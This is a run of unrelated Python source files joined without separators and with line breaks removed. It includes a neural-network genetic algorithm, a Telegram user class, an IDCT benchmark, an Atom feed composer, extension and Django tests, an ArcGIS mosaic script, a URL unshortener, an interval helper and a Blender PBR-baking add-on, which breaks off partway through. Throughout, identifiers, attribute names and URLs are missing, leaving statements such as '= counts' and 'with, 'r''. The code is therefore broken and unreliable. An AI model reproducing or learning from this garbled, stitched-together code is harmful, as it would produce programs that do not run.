#print("Mutation in second threshold") else: print("Unknown index for the matrix to mutate:", matrixToMutate) newPopulation.append(matrices) self.population = newPopulation return mutations def mutatePopulationSingle(self, survivors, mutationRate, crossOver): newPopulation = [] mutations = [0 for i in range(4)] for matrices in survivors: # matrices = self.population[s] if random.random() < mutationRate: selector = int(random.random() * self.coeff_size) # selector refers to the first weights matrix if selector < (self.inSize * self.hiddenSize): selector_row = int(selector/self.inSize) selector_col = selector % self.inSize try: matrices["first_weights"].setElem(selector_row, selector_col, random.random()) except: print("Selector: ", selector) print("Width: ", matrices["first_weights"].getWidth(), self.inSize, len(matrices["first_weights"].getData()[0])) print("Height: ", matrices["first_weights"].getHeight(), self.hiddenSize, len(matrices["first_weights"].getData())) print("Problems with setElem...") print(selector_row, selector_col) sys.exit() # print("Mutation in first matrix", selector, selector_row, selector_col) mutations[0] += 1 else: selector = selector - (self.inSize * self.hiddenSize) # selector refers to the first thresholds matrix if selector < self.hiddenSize: currVal = matrices["first_thresholds"].getElem(selector, 0) currVal += (0.1 - random.random()*0.2) if currVal > 2: currVal = 2 elif currVal < 0: currVal = 0 matrices["first_thresholds"].setElem(selector, 0, currVal) mutations[1] += 1 # print("Mutation in first threshold", selector) pass else: selector = selector - (self.hiddenSize) # selector refers to the second weights matrix if selector < (self.hiddenSize * self.outSize): selector_row = int(selector/self.outSize) selector_col = selector % self.outSize matrices["second_weights"].setElem(selector_row, selector_col, random.random()) mutations[2] += 1 # print("Mutation in second matrix", selector, selector_row, selector_col) # selector refers to the second thresholds else: selector = selector - (self.hiddenSize * self.outSize) currVal = matrices["second_thresholds"].getElem(selector, 0) currVal += (0.1 - random.random()*0.2) if currVal > 2: currVal = 2 elif currVal < 0: currVal = 0 matrices["second_thresholds"].setElem(selector, 0, currVal) mutations[3] += 1 #print("Mutation in second threshold") newPopulation.append(matrices) self.population = newPopulation return mutations def roulette(self, scores, intest=False): nextGen = [] selector = int(random.random() * self.size) selectors = [] beta = 0.0 mw = max(scores) roul = roulette(scores) for n in range(self.size): pair = [] ## no breeding, just fittest lives if intest: pair = [0, 1] print("Testing crossover,", pair) ## breed the pair nextGen.extend(self.mateParents(pair[0], pair[1], intest)) # purely for testing if True: for i in range(2): pair.append(roul.getNext()) ## breed the pair nextGen.extend(self.mateParents(pair[0], pair[1])) # just random roulette wheel picker and append to next gen.. else: nextGen.append(copy.deepcopy(self.population[roul.getNext()])) # print("Selected: ", selector) selectors.append(selector) # if we've grown the next generation to the maxpop size, then finish if len(nextGen) >= self.size: break # print(selectors) return nextGen # return self.population def validate(self): "Verifies that the sizes of the internal ANN matrices match those of the settings" valid = True for p in self.population: valid = valid and (p["first_weights"].getWidth() == self.inSize) valid = valid and (p["first_weights"].getHeight() == self.hiddenSize) valid = valid and (p["first_thresholds"].getWidth() == 1) valid = valid and (p["first_thresholds"].getHeight() == self.hiddenSize) return valid class roulette: def __init__(self, counts): = counts = sum( self.size = len( self.beta = 0 self.selector = 0 def getNext(self): self.beta += (random.random() * * 2.0) while (self.beta >[self.selector]): self.beta -=[self.selector] self.selector = (self.selector + 1) % self.size return self.selector
#!/usr/bin/env python from telegram import TelegramObject class User(TelegramObject): def __init__(self, id, first_name, last_name=None, username=None): = id self.first_name = first_name self.last_name = last_name self.username = username @property def name(self): if self.username: return '@%s' % self.username if self.last_name: return '%s %s' % (self.first_name, self.last_name) return self.first_name @staticmethod def de_json(data): return User(id=data.get('id', None), first_name=data.get('first_name', None), last_name=data.get('last_name', None), username=data.get('username', None)) def to_dict(self): data = {'id':, 'first_name': self.first_name} if self.last_name: data['last_name'] = self.last_name if self.username: data['username'] = self.username return data
from polyphony import testbench ''' +--------------------------------------------------------------------------+ | CHStone : A suite of Benchmark Programs for C-based High-Level Synthesis | | ======================================================================== | | | | * Collected and Modified : Y. Hara, H. Tomiyama, S. Honda, | | H. Takada and K. Ishii | | Nagoya University, Japan | | | | * Remarks : | | 1. This source code is reformatted to follow CHStone's style. | | 2. Test vectors are added for CHStone. | | 3. If "main_result" is 0 at the end of the program, the program is | | successfully executed. | | 4. Follow the copyright of each benchmark program. | +--------------------------------------------------------------------------+ /* * IDCT transformation of Chen algorithm * * @(#) $Id: chenidct.c,v 1.2 2003/07/18 10:19:21 honda Exp $ */ /************************************************************* Copyright (C) 1990, 1991, 1993 Andy C. Hung, all rights reserved. PUBLIC DOMAIN LICENSE: Stanford University Portable Video Research Group. If you use this software, you agree to the following: This program package is purely experimental, and is licensed "as is". Permission is granted to use, modify, and distribute this program without charge for any purpose, provided this license/ disclaimer notice appears in the copies. No warranty or maintenance is given, either expressed or implied. In no event shall the author(s) be liable to you or a third party for any special, incidental, consequential, or other damages, arising out of the use or inability to use the program for any purpose (or the loss of data), even if we have been advised of such possibilities. Any public reference or advertisement of this source code should refer to it as the Portable Video Research Group (PVRG) code, and not by any author(s) (or Stanford University) name. *************************************************************/ /* ************************************************************ chendct.c A simple DCT algorithm that seems to have fairly nice arithmetic properties. W. H. Chen, C. H. Smith and S. C. Fralick "A fast computational algorithm for the discrete cosine transform," IEEE Trans. Commun., vol. COM-25, pp. 1004-1009, Sept 1977. ************************************************************ ''' # Cos constants c1d4 = 362 c1d8 = 473 c3d8 = 196 c1d16 = 502 c3d16 = 426 c5d16 = 284 c7d16 = 100 ''' /* * * ChenIDCT() implements the Chen inverse dct. Note that there are two * input vectors that represent x=input, and y=output, and must be * defined (and storage allocated) before this routine is called. */ ''' def ChenIDct(x:list, y:list): def LS(r,s): return r << s def RS(r,s): return r >> s # Caution with rounding... def MSCALE(expr): return RS(expr, 9) # Loop over columns for i in range(8): b0 = LS(x[i + 0], 2) a0 = LS(x[i + 8], 2) b2 = LS(x[i + 16], 2) a1 = LS(x[i + 24], 2) b1 = LS(x[i + 32], 2) a2 = LS(x[i + 40], 2) b3 = LS(x[i + 48], 2) a3 = LS(x[i + 56], 2) # Split into even mode b0 = x0 b1 = x4 b2 = x2 b3 = x6. # And the odd terms a0 = x1 a1 = x3 a2 = x5 a3 = x7. c0 = MSCALE((c7d16 * a0) - (c1d16 * a3)) c1 = MSCALE((c3d16 * a2) - (c5d16 * a1)) c2 = MSCALE((c3d16 * a1) + (c5d16 * a2)) c3 = MSCALE((c1d16 * a0) + (c7d16 * a3)) # First Butterfly on even terms. a0 = MSCALE(c1d4 * (b0 + b1)) a1 = MSCALE(c1d4 * (b0 - b1)) a2 = MSCALE((c3d8 * b2) - (c1d8 * b3)) a3 = MSCALE((c1d8 * b2) + (c3d8 * b3)) b0 = a0 + a3 b1 = a1 + a2 b2 = a1 - a2 b3 = a0 - a3 # Second Butterfly a0 = c0 + c1 a1 = c0 - c1 a2 = c3 - c2 a3 = c3 + c2 c0 = a0 c1 = MSCALE(c1d4 * (a2 - a1)) c2 = MSCALE(c1d4 * (a2 + a1)) c3 = a3 y[i + 0] = b0 + c3 y[i + 8] = b1 + c2 y[i + 16] = b2 + c1 y[i + 24] = b3 + c0 y[i + 32] = b3 - c0 y[i + 40] = b2 - c1 y[i + 48] = b1 - c2 y[i + 56] = b0 - c3 # Loop over rows for i in range(8): idx = LS(i, 3) b0 = y[idx+0] a0 = y[idx+1] b2 = y[idx+2] a1 = y[idx+3] b1 = y[idx+4] a2 = y[idx+5] b3 = y[idx+6] a3 = y[idx+7] # Split into even mode b0 = x0 b1 = x4 b2 = x2 b3 = x6. # And the odd terms a0 = x1 a1 = x3 a2 = x5 a3 = x7. c0 = MSCALE((c7d16 * a0) - (c1d16 * a3)) c1 = MSCALE((c3d16 * a2) - (c5d16 * a1)) c2 = MSCALE((c3d16 * a1) + (c5d16 * a2)) c3 = MSCALE((c1d16 * a0) + (c7d16 * a3)) # First Butterfly on even terms. a0 = MSCALE(c1d4 * (b0 + b1)) a1 = MSCALE(c1d4 * (b0 - b1)) a2 = MSCALE((c3d8 * b2) - (c1d8 * b3)) a3 = MSCALE((c1d8 * b2) + (c3d8 * b3)) # Calculate last set of b's b0 = a0 + a3 b1 = a1 + a2 b2 = a1 - a2 b3 = a0 - a3 # Second Butterfly a0 = c0 + c1 a1 = c0 - c1 a2 = c3 - c2 a3 = c3 + c2 c0 = a0 c1 = MSCALE(c1d4 * (a2 - a1)) c2 = MSCALE(c1d4 * (a2 + a1)) c3 = a3 idx = LS(i, 3) y[idx+0] = b0 + c3 y[idx+1] = b1 + c2 y[idx+2] = b2 + c1 y[idx+3] = b3 + c0 y[idx+4] = b3 - c0 y[idx+5] = b2 - c1 y[idx+6] = b1 - c2 y[idx+7] = b0 - c3 # Retrieve correct accuracy. We have additional factor # of 16 that must be removed. for i in range(64): v = y[i] if v < 0: y[i] = (v - 8)>>4 else: y[i] = (v + 8)>>4 return 0 @testbench def test(): ins = [ 154, 192, 254, 239, 180, 128, 123, 110, 123, 180, 198, 180, 154, 136, 105, 136, 123, 136, 154, 136, 136, 123, 110, 123, 123, 154, 154, 180, 167, 136, 149, 123, 123, 154, 180, 180, 166, 154, 136, 123, 123, 154, 154, 166, 149, 180, 136, 136, 123, 136, 123, 123, 136, 198, 180, 154, 136, 110, 123, 123, 136, 154, 166, 136 ] outs = [None] * 64 expected = [ 1077, -250, 114, -109, 76, -27, 56, 12, -232, 156, -106, -16, -13, -9, -25, 8, 236, -74, 62, -20, 5, -4, 31, 6, 16, 48, -68, -18, -18, -7, 1, -16, 163, -30, -7, -25, 16, 23, -9, 22, 29, -9, -4, -4, -4, 13, -13, -8, 81, -2, -12, -10, 12, 15, 5, 11, 37, 3, -4, -7, -6, 6, 7, 18 ] ChenIDct(ins, outs) for i in range(64): print(outs[i]) assert outs[i] == expected[i] test()
# Copyright (c) 2014, Matt Layman from datetime import datetime import io import json import os import time from werkzeug.contrib.atom import AtomFeed from werkzeug.contrib.atom import FeedEntry from handroll import logger from handroll.composers import Composer from handroll.exceptions import AbortError from handroll.i18n import _ class AtomComposer(Composer): """Compose an Atom feed from an Atom metadata file (``.atom``). The ``AtomComposer`` parses the metadata specified in the source file and produces an XML Atom feed. ``AtomComposer`` uses parameters that are needed by Werkzeug's ``AtomFeed`` API. Refer to the `Werkzeug documentation <>`_ for all the available options. The dates in the feed should be in `RfC 3339 <>`_ format (e.g., ``2014-06-13T11:39:30``). Here is a sample feed: .. literalinclude:: ../sample/atom_sample.atom """ def compose(self, catalog, source_file, out_dir): root, ext = os.path.splitext(os.path.basename(source_file)) filename = root + '.xml' output_file = os.path.join(out_dir, filename) if self._needs_update(source_file, output_file):'Generating Atom XML for {source_file} ...').format( source_file=source_file)) feed = self._parse_feed(source_file) with open(output_file, 'wb') as out: out.write(feed.to_string().encode('utf-8')) out.write(b'<!-- handrolled for excellence -->\n') else: logger.debug(_('Skipping {filename} ... It is up to date.').format( filename=filename)) def _needs_update(self, source_file, out_file): """Check if the output file needs to be updated by looking at the modified times of the source file and output file.""" if os.path.exists(out_file): return os.path.getmtime(source_file) > os.path.getmtime(out_file) else: # The file doesn't exist so it definitely needs to be "updated." return True def _parse_feed(self, source_file): try: with, 'r', encoding='utf-8') as f: metadata = json.loads( if metadata.get('entries') is None: raise ValueError(_('Missing entries list.')) entries = metadata['entries'] # AtomFeed expects FeedEntry objects for the entries keyword so # remove it from the metadata and add it after the feed is built. del metadata['entries'] feed = AtomFeed(**metadata) [feed.add(self._make_entry(entry)) for entry in entries] except ValueError as error: raise AbortError(_('Invalid feed {source_file}: {error}').format( source_file=source_file, error=str(error))) return feed def _make_entry(self, data): # Convert dates into datetime instances. if 'updated' in data: data['updated'] = self._convert_date(data['updated']) if 'published' in data: data['published'] = self._convert_date(data['published']) return FeedEntry(**data) def _convert_date(self, date): """Convert a date string into a datetime instance. Assumes date string is RfC 3389 format.""" time_s = time.strptime(date, '%Y-%m-%dT%H:%M:%S') return datetime.fromtimestamp(time.mktime(time_s))
# Copyright 2014-2015 ARM Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # pylint: disable=E0611,R0201,E1101 from unittest import TestCase from import assert_equal, raises, assert_true from wlauto.core.extension import Extension, Parameter, Param, ExtensionMeta, Module from wlauto.utils.types import list_of_ints from wlauto.exceptions import ConfigError class MyMeta(ExtensionMeta): virtual_methods = ['validate', 'virtual1', 'virtual2'] class MyBaseExtension(Extension): __metaclass__ = MyMeta name = 'base' parameters = [ Parameter('base'), ] def __init__(self, **kwargs): super(MyBaseExtension, self).__init__(**kwargs) self.v1 = 0 self.v2 = 0 self.v3 = '' def virtual1(self): self.v1 += 1 self.v3 = 'base' def virtual2(self): self.v2 += 1 class MyAcidExtension(MyBaseExtension): name = 'acid' parameters = [ Parameter('hydrochloric', kind=list_of_ints, default=[1, 2]), 'citric', ('carbonic', int), ] def __init__(self, **kwargs): super(MyAcidExtension, self).__init__(**kwargs) self.vv1 = 0 self.vv2 = 0 def virtual1(self): self.vv1 += 1 self.v3 = 'acid' def virtual2(self): self.vv2 += 1 class MyOtherExtension(MyBaseExtension): name = 'other' parameters = [ Param('mandatory', mandatory=True), Param('optional', allowed_values=['test', 'check']), ] class MyOtherOtherExtension(MyOtherExtension): name = 'otherother' parameters = [ Param('mandatory', override=True), ] class MyOverridingExtension(MyAcidExtension): name = 'overriding' parameters = [ Parameter('hydrochloric', override=True, default=[3, 4]), ] class MyThirdTeerExtension(MyOverridingExtension): name = 'thirdteer' class MultiValueParamExt(Extension): name = 'multivalue' parameters = [ Parameter('test', kind=list_of_ints, allowed_values=[42, 7, 73]), ] class MyCoolModule(Module): name = 'cool_module' capabilities = ['fizzle'] def initialize(self): self.fizzle_factor = 0 # pylint: disable=attribute-defined-outside-init def fizzle(self): self.fizzle_factor += 1 class MyEvenCoolerModule(Module): name = 'even_cooler_module' capabilities = ['fizzle'] def fizzle(self): self.owner.self_fizzle_factor += 2 class MyModularExtension(Extension): name = 'modular' parameters = [ Parameter('modules', override=True, default=['cool_module']), ] class MyOtherModularExtension(Extension): name = 'other_modular' parameters = [ Parameter('modules', override=True, default=[ 'cool_module', 'even_cooler_module', ]), ] def __init__(self, **kwargs): super(MyOtherModularExtension, self).__init__(**kwargs) self.self_fizzle_factor = 0 class FakeLoader(object): modules = [ MyCoolModule, MyEvenCoolerModule, ] def get_module(self, name, owner, **kwargs): # pylint: disable=unused-argument for module in self.modules: if == name: return _instantiate(module, owner) class ExtensionMetaTest(TestCase): def test_propagation(self): acid_params = [ for p in MyAcidExtension.parameters] assert_equal(acid_params, ['modules', 'base', 'hydrochloric', 'citric', 'carbonic']) @raises(ValueError) def test_duplicate_param_spec(self): class BadExtension(MyBaseExtension): # pylint: disable=W0612 parameters = [ Parameter('base'), ] def test_param_override(self): class OverridingExtension(MyBaseExtension): # pylint: disable=W0612 parameters = [ Parameter('base', override=True, default='cheese'), ] assert_equal(OverridingExtension.parameters['base'].default, 'cheese') @raises(ValueError) def test_invalid_param_spec(self): class BadExtension(MyBaseExtension): # pylint: disable=W0612 parameters = [ 7, ] def test_virtual_methods(self): acid = _instantiate(MyAcidExtension) acid.virtual1() assert_equal(acid.v1, 1) assert_equal(acid.vv1, 1) assert_equal(acid.v2, 0) assert_equal(acid.vv2, 0) assert_equal(acid.v3, 'acid') acid.virtual2() acid.virtual2() assert_equal(acid.v1, 1) assert_equal(acid.vv1, 1) assert_equal(acid.v2, 2) assert_equal(acid.vv2, 2) class ParametersTest(TestCase): def test_setting(self): myext = _instantiate(MyAcidExtension, hydrochloric=[5, 6], citric=5, carbonic=42) assert_equal(myext.hydrochloric, [5, 6]) assert_equal(myext.citric, '5') assert_equal(myext.carbonic, 42) def test_validation_ok(self): myext = _instantiate(MyOtherExtension, mandatory='check', optional='check') myext.validate() def test_default_override(self): myext = _instantiate(MyOverridingExtension) assert_equal(myext.hydrochloric, [3, 4]) myotherext = _instantiate(MyThirdTeerExtension) assert_equal(myotherext.hydrochloric, [3, 4]) def test_multivalue_param(self): myext = _instantiate(MultiValueParamExt, test=[7, 42]) myext.validate() assert_equal(myext.test, [7, 42]) @raises(ConfigError) def test_bad_multivalue_param(self): myext = _instantiate(MultiValueParamExt, test=[5]) myext.validate() @raises(ConfigError) def test_validation_no_mandatory(self): myext = _instantiate(MyOtherExtension, optional='check') myext.validate() @raises(ConfigError) def test_validation_no_mandatory_in_derived(self): _instantiate(MyOtherOtherExtension) @raises(ConfigError) def test_validation_bad_value(self): myext = _instantiate(MyOtherExtension, mandatory=1, optional='invalid') myext.validate() class ModuleTest(TestCase): def test_fizzle(self): myext = _instantiate(MyModularExtension) myext.load_modules(FakeLoader()) assert_true(myext.can('fizzle')) myext.fizzle() assert_equal(myext.fizzle_factor, 1) def test_self_fizzle(self): myext = _instantiate(MyOtherModularExtension) myext.load_modules(FakeLoader()) myext.fizzle() assert_equal(myext.self_fizzle_factor, 2) def _instantiate(cls, *args, **kwargs): # Needed to get around Extension's __init__ checks return cls(*args, **kwargs)
from django.test import TestCase from django.core.urlresolvers import reverse, resolve from ..views import async class SearchUrlTest(TestCase): def test_search(self): actual = reverse('async:search:search', kwargs={ 'organization': 'habitat', 'project': '123', }) expected = '/async/organizations/habitat/projects/123/search/' assert actual == expected resolved = resolve( '/async/organizations/habitat/projects/123/search/') assert resolved.func.__name__ == async.Search.__name__ assert resolved.kwargs['organization'] == 'habitat' assert resolved.kwargs['project'] == '123' # def test_search_export(self): # actual = reverse('async:search:export', # kwargs={ # 'organization': 'habitat', # 'project': '123', # }) # expected = '/async/organizations/habitat/projects/123/search/export/' # assert actual == expected # resolved = resolve( # '/async/organizations/habitat/projects/123/search/export/') # assert resolved.func.__name__ == async.SearchExport.__name__ # assert resolved.kwargs['organization'] == 'habitat' # assert resolved.kwargs['project'] == '123'
#!/usr/bin/env python # -*- coding: utf-8 -*- # Create a Mosaic Dataset in the workspace and add all # *.img rasters from the input directory # # python "C:\workspace\dems" "C:\workspace" "26915.prj" import arcpy,sys,os from config import * from distutils.spawn import * from arcpy import * ################ Usage check and argument assigning if len(sys.argv) != 4: print "Usage: <input directory> <workspace/output dir> <.prj file>" print "The input directory should have the img rasters in it" print "Contents in the output directory will be overwritten" exit(-1) else: inpath = config.get('paths','dem_output_dir') workspacedir = config.get('arcgis','workspace') prjfile = config.get('projection','prj_file') arcpy.env.workspace = workspacedir gdbname = config.get('arcgis','dem_mosaic_name') # Create a File GeoDatabase to house the Mosaic dataset arcpy.CreateFileGDB_management(workspacedir, gdbname) # Create Mosaic Dataset # mdname = "DEM_MOSAIC" noband = "1" pixtype = "32_BIT_FLOAT" pdef = "NONE" wavelength = "" arcpy.CreateMosaicDataset_management(gdbname, mdname, prjfile, noband, pixtype, pdef, wavelength) # Add rasters to Mosaic Dataset # mdname = gdbname + "/" + mdname rastype = "ERDAS IMAGINE" # updatecs = "NO_CELL_SIZES" updatebnd = "NO_BOUNDARY" updateovr = "UPDATE_OVERVIEWS" maxlevel = "0" # pyramid level maxcs = "" maxdim = "" spatialref = "" inputdatafilter = "*.img" subfolder = "NO_SUBFOLDERS" duplicate = "EXCLUDE_DUPLICATES" buildpy = "NO_PYRAMIDS" calcstats = "NO_STATISTICS" # CALCULATE_STATISTICS buildthumb = "NO_THUMBNAILS" comments = "Add Raster Datasets" forcesr = "NO_FORCE_SPATIAL_REFERENCE" arcpy.AddRastersToMosaicDataset_management( mdname, rastype, inpath, updatecs, updatebnd, updateovr, maxlevel, maxcs, maxdim, spatialref, inputdatafilter, subfolder, duplicate, buildpy, calcstats, buildthumb, comments, forcesr)
# -*- coding: utf-8 -*- """Unshortener Documentation This module unshortens URLs """ import re import http from urllib.parse import urlparse from http import client from isurlshortener.exceptions import PathMissing, UnhandledHTTPStatusCode, LocationHeaderMissing, ProtocolException class Unshortener(object): #FIXME: Most servers redirect http to https --> special handling for that? @staticmethod def unshorten_url(url: str) -> str: """Tries to unshorten an URL by requesting it and checking HTTP status Args: url: URL to check. The url MUST contain a protocol (e.g., http://), a domain (e.g.,, and a path (e.g., something/) --> Returns: Unshortened URL Raises: IsUrlShortener.LocationHeaderMissing: Server did not return a Location IsUrlShortener.UnhandledHTTPStatusCode: Unsupported HTTP status code """ url = Unshortener._prepare_url(url) if url.path is '' or url.path is '/': raise PathMissing() server_connection = Unshortener._get_connection(url) server_connection.request('GET', url.path) response = server_connection.getresponse() if response.status in range(300, 309): return Unshortener._get_location_from_header(response.getheaders()) elif response.status in range(200, 201): return url.geturl() else: raise UnhandledHTTPStatusCode(response.status) @staticmethod def _get_location_from_header(headers: list) -> str: """Returns the location information from the headers Args: headers: Header returned from the server Returns: Location information Raises: IsUrlShortener.LocationHeaderMissing: Location field missing in the header """ for header_field in headers: if header_field[0].lower() == 'location': return header_field[1] raise LocationHeaderMissing @staticmethod def _prepare_url(url: str) -> dict: """Prepares a given URL strict for the unshortener Args: url: URL prepare Returns: Dict with the prepared URL information Raises: IsUrlShortener.ProtocolException: http/https protocol prefix is missing """ if not re.findall('^(http[s]?://)', url): raise ProtocolException('Invalid protocol or no protocol given') return urlparse(url) @staticmethod def _get_connection(url: dict) -> [http.client.HTTPConnection, http.client.HTTPSConnection]: """Prepares a connection to a given server Args: url: URL with server information Returns: Connection to the server Raises: IsUrlShortener.ProtocolException: Protocol not supported """ if url.scheme == 'http': return http.client.HTTPConnection(url.netloc) elif url.scheme == 'https': return http.client.HTTPSConnection(url.netloc) else: raise ProtocolException('Protocol Exception: "{}"'.format(url.scheme))
from math import isinf class Interval: def __init__(self, val_from, val_to): self._val_from = float(val_from) self._val_to = float(val_to) def __contains__(self, value): return bool(self._val_from <= float(value) <= self._val_to) def __str__(self): return "{}-{}".format(self._val_from, self._val_to) def is_open(self): return bool(isinf(self._val_to)) class Intervals: def __init__(self, intervals): self._open_intervals = [] self._closed_intervals = [] for i in intervals: if i.is_open(): self._open_intervals.append(i) else: self._closed_intervals.append(i) def val_in_open_interval(self, value): return self.val_in(self._open_intervals, value) def val_in_closed_interval(self, value): return self.val_in(self._closed_intervals, value) def val_in(self, intervals, value): for interval in intervals: if value in interval: return True return False
import bpy import os def setSceneOpts(): global channels global sizex global sizey global selected_to_active # VARIABLES sizex = bpy.context.scene.bake_pbr_channels.sizex sizey = bpy.context.scene.bake_pbr_channels.sizey selected_to_active= bpy.context.scene.bake_pbr_channels.seltoact channels = {"metallic":["ME","GLOSSY"], "occlusion":["AO","AO"], "normal":["NM","NORMAL"], "emit":["EM","EMIT"], "roughness":["RO","ROUGHNESS"], "opacity":["OP","TRANSMISSION"], "albedo":["AT","DIFFUSE"]} bpy.context.scene.render.image_settings.file_format = "OPEN_EXR" bpy.context.scene.render.image_settings.color_mode = "RGBA" bpy.context.scene.render.image_settings.exr_codec = "ZIP" bpy.context.scene.render.image_settings.color_depth = "16" #set bake options bpy.context.scene.render.bake_type = "TEXTURE" bpy.context.scene.render.bake.use_pass_direct = 0 bpy.context.scene.render.bake.use_pass_indirect = 0 bpy.context.scene.render.bake.use_pass_color = 1 bpy.context.scene.render.bake.use_selected_to_active = selected_to_active #__________________________________________________________________________________ def mergeObjects(): global selectedObjects global object global selObject #agrupo los seleccionados y el activo object = bpy.context.active_object selectedObjects = bpy.context.selected_objects[:].copy() selectedObjects.remove(bpy.context.active_object) # si es selected to active hago un merge de los objetos restantes if selected_to_active: bpy.ops.object.select_all(action="DESELECT") for o in selectedObjects: = True = selectedObjects[0] bpy.ops.object.convert(target="MESH", keep_original=True) selObject = bpy.context.active_object bpy.ops.object.join() bpy.ops.object.transform_apply(location=True, rotation=True, scale=True, properties=True) else: selObject=bpy.context.active_object #seteo el objeto activo = object #__________________________________________________________________________________ def createTempMats(): global ms global copyMats global roughMats global transMats global glossyMats #lista de materiales originales if not selected_to_active: ms = [mat.material for mat in object.material_slots] else: ms = [mat.material for mat in selObject.material_slots] #sumo materiales copia y reemplazo slots for matType in ["_glossyTemp","_copyTemp","_roughnessTemp","_trans"]: ims = 0 for mat in ms: mc = mat.copy() = if not selected_to_active: object.material_slots[ims].material = mc else: selObject.material_slots[ims].material = mc ims += 1 copyMats = [mat for mat in if"_copyTemp")] glossyMats = [mat for mat in if"_glossyTemp")] roughMats = [mat for mat in if"_roughnessTemp")] transMats = [mat for mat in if"_trans")] #__________________________________________________________________________________ # mezcloGlossy def mixGlossy(material): mat = material for node in mat.node_tree.nodes[:]: if node.type == "BSDF_PRINCIPLED": nprin ="ShaderNodeBsdfPrincipled") # nuevo principled mix ="ShaderNodeMixShader")[2],nprin.outputs[0])[1],node.outputs[0]) if node.inputs["Metallic"].is_linked:[0],node.inputs['Metallic'].links[0].from_socket) else: mix.inputs[0].default_value = node.inputs['Metallic'].default_value #copio metalico if node.inputs["Metallic"].is_linked:[0],node.inputs["Metallic"].links[0].from_socket)['BSDF'].links[0].to_socket,mix.outputs[0]) #copio seteos de p a p for entrada in ["Base Color","Roughness"]: if node.inputs[entrada].is_linked:[entrada],node.inputs[entrada].links[0].from_socket) nprin.inputs[entrada].default_value = node.inputs[entrada].default_value node.inputs['Specular'].default_value = 0 node.inputs['Metallic'].default_value = 0 # ambos a cero nprin.inputs['Specular'].default_value = 0 nprin.inputs['Metallic'].default_value = 1 # nuevo prin a 1 for link in mat.node_tree.links: if == "Metallic": mat.node_tree.links.remove(link) #__________________________________________________________________________________ #desmetalizar def desmetalizar(material): for link in mat.node_tree.links: if == "Metallic": mat.node_tree.links.remove(link) for matnode in mat.node_tree.nodes: if matnode.type == "BSDF_PRINCIPLED": # desconecto metallic y seteo cero if matnode.inputs['Metallic'].is_linked: matnode.inputs["Metallic"].default_value = 0 matnode.inputs["Specular"].default_value = 0 else: matnode.inputs["Metallic"].default_value = 0 matnode.inputs['Specular'].default_value = 0 #destransparentizar def destransparentizar(material): for link in mat.node_tree.links: if == "Transmission": mat.node_tree.links.remove(link) for matnode in mat.node_tree.nodes: if matnode.type == "BSDF_PRINCIPLED": # desconecto metallic y seteo cero if matnode.inputs['Transmission'].is_linked: matnode.inputs["Transmission"].default_value = 0 else: matnode.inputs["Transmission"].default_value = 0 #saca todos los speculares def desespecular(material): for matnode in material.node_tree.nodes: if matnode.type == "BSDF_PRINCIPLED": matnode.inputs["Specular"].default_value = 0 #base color a 1 def baseColorA1(material): for link in mat.node_tree.links: if == "Base Color": mat.node_tree.links.remove(link) for node in mat.node_tree.nodes: if node.type == "BSDF_PRINCIPLED": node.inputs['Base Color'].default_value= (1,1,1,1) #cambia slots def cambiaSlots(objeto,sufijo): for ms in objeto.material_slots: ms.material =["_")[0]+sufijo] #__________________________________________________________________________________ def removeMatProps(): global mat #saco los metales en las copias de copy for mat in copyMats: desmetalizar(mat) destransparentizar(mat) #saco los metales en las copias de glossy for mat in glossyMats: desespecular(mat) mixGlossy(mat) destransparentizar(mat) #llevo a uno los base color de roughness for mat in roughMats: desespecular(mat) baseColorA1(mat) destransparentizar(mat) # saco metales para transmisiones for mat in transMats: desmetalizar(mat) desespecular(mat) baseColorA1(mat) #__________________________________________________________________________________ def bake(map): #crea imagen imgpath = "%s/IMAGES" % (os.path.dirname( img =[map][0], width=sizex, height=sizey, alpha=True,float_buffer=True) print ("Render: %s" % (channels[map][1])) = 'Linear' if not selected_to_active: img.filepath = "%s/%s_%s.exr" % (imgpath,, channels[map][0]) else: img.filepath = "%s/%s_%s.exr" % (imgpath,, channels[map][0]) #cambio materiales if channels[map][0] == "ME": cambiaSlots(selObject,"_glossyTemp") if channels[map][0] == "RO": cambiaSlots(selObject,"_roughnessTemp") if channels[map][0] in ["AT","AO","NM","EM","OP"]: cambiaSlots(selObject,"_copyTemp") if channels[map][0] in ["OP"]: cambiaSlots(selObject,"_trans") # creo nodos y bakeo if not selected_to_active: for activeMat in #aca estaba el mscopy # seteo el nodo node ="ShaderNodeTexImage") node.image = img = node node.color_space = "NONE" = True else: activeMat = object.active_material # seteo el nodo node ="ShaderNodeTexImage") node.image = img = node node.color_space = "NONE" = True bpy.ops.object.bake(type=channels[map][1]) img.save_render(img.filepath) print ("%s Done!" % (channels[map][1])) #__________________________________________________________________________________ def executePbr(): #bakeo setSceneOpts() mergeObjects() createTempMats() removeMatProps() for map in channels.keys(): if getattr(bpy.context.scene.bake_pbr_channels,map): bake(map) #restauro material slots for matSlot,rms in zip(selObject.material_slots,ms): matSlot.material = rms #remuevo materiales copia for ma in copyMats+glossyMats+roughMats+transMats: #borro el merge if selected_to_active:, do_unlink=True, do_id_user=True, do_ui_user=True) class BakePbr (bpy.types.Operator): """Bake PBR materials""" bl_idname = "object.bake_pbr_maps" bl_label = "Bake PBR Maps" @classmethod def poll(cls, context): return context.active_object is not None def execute(self, context): executePbr() return {'FINISHED'} #__________________________________________________________________________________ class bakeChannels(bpy.types.PropertyGroup): metallic = bpy.props.BoolProperty(name="Metallic",default=False) occlusion = bpy.props.BoolProperty(name="Occlusion",default=False) normal = bpy.props.BoolProperty(name="Normal",default=False) emit = bpy.props.BoolProperty(name="Emit",default=False) roughness = bpy.props.BoolProperty(name="Roughness",default=False) opacity = bpy.props.BoolProperty(name="Opacity",default=False) albedo = bpy.props.BoolProperty(name="Albedo",default=False) sizex = bpy.props.IntProperty(name="Size x", default= 1024) sizey = bpy.props.IntProperty(name="Size y", default= 1024) seltoact = bpy.props.BoolProperty(name="Selected to active", default= True) bpy.utils.register_class(bakeChannels) class LayoutDemoPanel(bpy.types.Panel): """Creates a Panel in the scene context of the properties editor""" bl_label = "Bake PBR" bl_idname = "RENDER_PT_layout" bl_space_type = 'PROPERTIES' bl_region_type = 'WINDOW' bl_context = "render" def draw(self, context): layout = self.layout scene = context.scene # Create a simple row. layout.label(text=" Channels:") row = layout.row() row.prop(scene.bake_pbr_channels, "metallic") 